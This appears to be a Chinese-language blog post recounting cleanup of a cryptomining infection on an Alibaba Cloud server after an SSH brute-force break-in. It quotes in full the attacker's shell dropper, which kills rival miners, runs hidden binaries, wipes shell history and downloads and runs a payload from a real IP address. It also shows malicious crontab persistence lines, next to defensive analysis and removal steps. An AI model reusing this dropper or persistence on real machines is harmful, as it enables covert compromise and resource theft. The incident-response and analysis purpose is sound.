涉及挖礦程序、ECS暴力破解成功、惡意腳本代碼執行多階段異常處理心得

背景：

　　阿里云服務器報警：有木馬植入，服務器cpu飆升。

處理：

#木馬植入命令：
./network rm -rf /var/tmp/Documents ; 
mkdir /var/tmp/Documents 2>&1 ; 
crontab -r ; 
chattr -iae ~/.ssh/authorized_keys >/dev/null 2>&1 ; 
cd /var/tmp ; 
chattr -iae /var/tmp/Documents/.diicot ; 
pkill Opera ; pkill cnrig ; pkill java ; 
killall java ;  
pkill xmrig ; 
killall cnrig ; 
killall xmrig ;
cd /var/tmp/; 
mv /var/tmp/diicot /var/tmp/Documents/.diicot ; 
mv /var/tmp/kuak /var/tmp/Documents/kuak ; 
cd /var/tmp/Documents ; 
chmod +x .* ; 
/var/tmp/Documents/.diicot >/dev/null 2>&1 & disown ; 
history -c ; 
rm -rf .bash_history ~/.bash_history ; 
rm -rf /tmp/cache ; cd /tmp/ ; 
wget -q 85.31.47.99/.NzJjOTYwxx5/.balu || curl -O -s -L 85.31.47.99/.NzJjOTYwxx5/.balu ; 
mv .balu cache ; chmod +x cache ; 
./cache >/dev/null 2>&1 & disown  ; 
history -c ; 
rm -rf .bash_history ~/.bash_history

　　命令分析：

初始化操作
- rm -rf /var/tmp/Documents：強制刪除/var/tmp/Documents目錄（可能用于清理舊痕跡）
- mkdir /var/tmp/Documents 2>&1：創建新的/var/tmp/Documents目錄，并將錯誤輸出重定向（避免顯示錯誤信息）
- crontab -r：刪除當前用戶的所有定時任務（清除可能存在的其他任務或防御機制）
權限篡改與進程清理
- chattr -iae ~/.ssh/authorized_keys >/dev/null 2>&1：移除 SSH 授權密鑰文件的特殊屬性（可能為了后續篡改 SSH 密鑰留后門）
- 一系列pkill和killall命令：強制終止 Opera 瀏覽器、java 程序以及 xmrig、cnrig 等挖礦程序（可能是為了清除競爭對手的惡意程序，或關閉可能的監控軟件）
惡意文件隱藏與執行
- chattr -iae /var/tmp/Documents/.diicot：移除惡意文件的特殊屬性（使其可修改和執行）
- mv命令：將diicot和kuak文件移動到隱藏目錄（偽裝成正常文檔目錄下的文件）
- chmod +x .*：為隱藏文件添加執行權限
- /var/tmp/Documents/.diicot >/dev/null 2>&1 & disown：后臺執行惡意程序.diicot，并脫離終端控制（使其在后臺持續運行）
痕跡清理
- history -c：清除當前會話的命令歷史
- rm -rf .bash_history ~/.bash_history：刪除保存的命令歷史文件（避免被發現操作痕跡）
下載并執行新的惡意程序
- 通過wget或curl從85.31.47.99這個 IP 地址下載名為.balu的文件
- 將下載的文件重命名為cache并添加執行權限
- 后臺執行該程序并再次清理命令歷史

　　補救措施：

　　1. 關閉服務器ssh端口

　　2. 查看當前運行的異常進程：

ps aux | grep -E "diicot|kuak|cache|xmrig|cnrig"  # 結合惡意腳本中的進程名排查
top/htop  # 觀察CPU/內存占用異常的進程（如挖礦程序通常占用高資源）

[ecs-assist-user@iZ2zef6hu7zpvvnltbgss3Z ~]$ ps aux | grep -E "diicot|kuak|cache|xmrig|cnrig"
root      3836  0.0  0.0 1227348 3340 ?        Sl   04:04   0:00 cache
www      26335  0.0  0.1 196180 11772 ?        S    Aug03   0:02 nginx: cache manager process
ecs-ass+ 31383  0.0  0.0 112812   988 pts/0    R+   10:08   0:00 grep --color=auto -E diicot|kuak|cache|xmrig|cnrig

　　3.強制終止可疑進程（使用進程 ID，如1234）：

sudo kill -9 3836
sudo rm -rf /tmp/cache /var/tmp/Documents

//檢查是否有其他關聯文件或進程復活機制（如定時任務）：
sudo crontab -l # 查看當前用戶定時任務 
sudo ls -la /etc/cron* # 檢查系統級定時任務

　top結果：

top - 10:20:22 up 64 days, 14:19,  0 users,  load average: 15.06, 12.13, 10.91
Tasks: 204 total,   8 running, 195 sleeping,   1 stopped,   0 zombie
%Cpu(s): 52.2 us, 47.8 sy,  0.0 ni,  0.0 id,  0.0 wa,  0.0 hi,  0.1 si,  0.0 st
KiB Mem :  7732792 total,   272968 free,  4592416 used,  2867408 buff/cache
KiB Swap:        0 total,        0 free,        0 used.  2514492 avail Mem 

  PID USER      PR  NI    VIRT    RES    SHR S  %CPU %MEM     TIME+ COMMAND                                                                                       
 3868 root      20   0 2441952   2.3g      4 S  73.1 31.1 646:32.16 151e8df3                                                                                      
31337 www       20   0  244260  27740   4920 R  47.5  0.4   1:35.97 php-fpm                                                                                       
31458 www       20   0  244256  27244   4920 R  45.8  0.4   0:47.46 php-fpm                                                                                       
31871 www       20   0  244196  27972   4912 R  44.2  0.4   0:34.83 php-fpm                                                                                       
32106 www       20   0  242148  26684   4900 R  43.2  0.3   0:14.48 php-fpm                                                                                       
32182 www       20   0  244196  27088   4848 R  43.2  0.4   0:06.68 php-fpm                                                                                       
31430 www       20   0  242216  26768   4916 R  42.2  0.3   1:49.48 php-fpm                                                                                       
32238 www       20   0  233952  17176   4840 S  10.6  0.2   0:00.32 php-fpm                                                                                       
32102 www       20   0  244256  27208   4876 S   8.3  0.4   0:24.24 php-fpm                                                                                       
31875 www       20   0  242208  25208   4920 S   7.6  0.3   0:30.23 php-fpm                                                                                       
31429 www       20   0  242148  25696   4916 S   7.3  0.3   0:59.79 php-fpm                                                                                       
31874 www       20   0  242148  26692   4884 S   7.3  0.3   0:30.45 php-fpm                                                                                       
31876 www       20   0  242208  25756   4920 S   7.3  0.3   0:51.94 php-fpm                                                                                       
31903 www       20   0  242144  27176   4904 S   7.0  0.4   0:09.00 php-fpm                                                                                       
 1117 root      20   0 2436596  17372   6900 S   1.0  0.2 411:08.98 argusagent                                                                                    
24119 root      20   0  231340  83840  10360 S   1.0  1.1 295:33.94 AliYunDunMonito                                                                               
 2036 redis     20   0  565288 249392   1996 S   0.3  3.2 228:12.62 redis-server                                                                                  
22120 root      20   0  686528   9628   5172 S   0.3  0.1  35:45.96 aliyun-service                                                                                
24086 root      20   0  118508   8144   4832 S   0.3  0.1  85:02.77 AliYunDun                                                                                     
26331 www       20   0  245704  69064  10580 S   0.3  0.9   5:56.22 nginx                                                                                         
26333 www       20   0  250752  74476  10576 S   0.3  1.0  23:57.13 nginx                                                                                         
32232 ecs-ass+  20   0  162104   2348   1592 R   0.3  0.0   0:00.03 top                                                                                           
    1 root      20   0   51868   3664   2144 S   0.0  0.0   9:03.38 systemd

查找151e8df3進程的可執行文件路徑：
sudo ls -l /proc/3868/exe # 進程未終止時，通過proc查看執行路徑 # 若已終止，搜索系統中類似名稱的文件 sudo find / -name "151e8df3" -type f
sudo rm -f /path/to/151e8df3

　　定時任務的處理：

[ecs-assist-user@iZ2zef6hu7zpvvnltbgss3Z tmp]$ sudo crontab -l
@daily /var/tmp/9659fb05/./80ff5709 > /dev/null 2>&1 & disown
@reboot /var/tmp/9659fb05/./80ff5709 > /dev/null 2>&1 & disown
* * * * * /var/tmp/9659fb05/./80ff5709 > /dev/null 2>&1 & disown
@monthly /var/tmp/9659fb05/./80ff5709 > /dev/null 2>&1 & disown
[ecs-assist-user@iZ2zef6hu7zpvvnltbgss3Z tmp]$ sudo ls -la /etc/cron*
-rw-------  1 root root    0 May 16  2023 /etc/cron.deny
-rw-r--r--. 1 root root  451 Jun 10  2014 /etc/crontab

/etc/cron.d:
total 16
drwxr-xr-x.  2 root root 4096 Jun 28  2024 .
drwxr-xr-x. 87 root root 4096 Aug 13 09:54 ..
-rw-r--r--   1 root root  128 May 16  2023 0hourly
-rw-------   1 root root  235 Dec 16  2022 sysstat

/etc/cron.daily:
total 16
drwxr-xr-x.  2 root root 4096 Jun 28  2024 .
drwxr-xr-x. 87 root root 4096 Aug 13 09:54 ..
-rwx------.  1 root root  219 Apr  1  2020 logrotate
-rwxr-xr-x.  1 root root  618 Oct 30  2018 man-db.cron

/etc/cron.hourly:
total 12
drwxr-xr-x.  2 root root 4096 Jun 28  2024 .
drwxr-xr-x. 87 root root 4096 Aug 13 09:54 ..
-rwxr-xr-x   1 root root  392 May 16  2023 0anacron

/etc/cron.monthly:
total 8
drwxr-xr-x.  2 root root 4096 Jun 10  2014 .
drwxr-xr-x. 87 root root 4096 Aug 13 09:54 ..

/etc/cron.weekly:
total 8
drwxr-xr-x.  2 root root 4096 Jun 10  2014 .
drwxr-xr-x. 87 root root 4096 Aug 13 09:54 ..

sudo crontab -r  # 清除當前用戶（root）的所有定時任務
sudo rm -rf /var/tmp/9659fb05 # 刪除整個惡意程序目錄

　　4.禁用惡意文件執行權限

chmod -x /var/tmp/Documents/.* /tmp/cache
rm -rf /var/tmp/Documents /tmp/cache

　　5.查看/etc/rc.local等開機啟動腳本：

sudo cat /etc/rc.local

　　6.木馬禁止刪除：

[ecs-assist-user@iZ2zef6hu7zpvvnltbgss3Z f46a6fbd]$ sudo rm -rf /var/tmp/f46a6fbd/
rm: cannot remove ‘/var/tmp/f46a6fbd/80ff5709’: Operation not permitted

# 進入目錄
cd /var/tmp/f46a6fbd/

# 查看文件屬性（若有i或a屬性，需移除）
lsattr 80ff5709

# 移除特殊屬性（-i移除不可修改，-a移除僅追加）
sudo chattr -ia 80ff5709

　　7.掃描代碼篡改

# 搜索近期新增的可疑PHP文件（如包含eval、base64_decode等危險函數的文件）
sudo find /path/to/website -name "*.php" -mtime -7  # 查找7天內新增的PHP文件
sudo grep -r "eval(" /path/to/website  # 搜索包含危險函數的文件

posted @ 2025-08-13 20:16 徐傳秉閱讀(368) 評論(0) 收藏舉報

刷新頁面返回頂部

矢落悳ふ駭 - 徐sir

涉及挖礦程序、ECS暴力破解成功、惡意腳本代碼執行多階段異常處理心得

公告

矢落悳ふ駭 - 徐sir

涉及挖礦程序、ECS暴力破解成功、惡意腳本代碼執行多階段異常處理心得

公告

涉及挖礦程序、ECS暴力破解成功、惡意腳本代碼執行多階段異常處理心得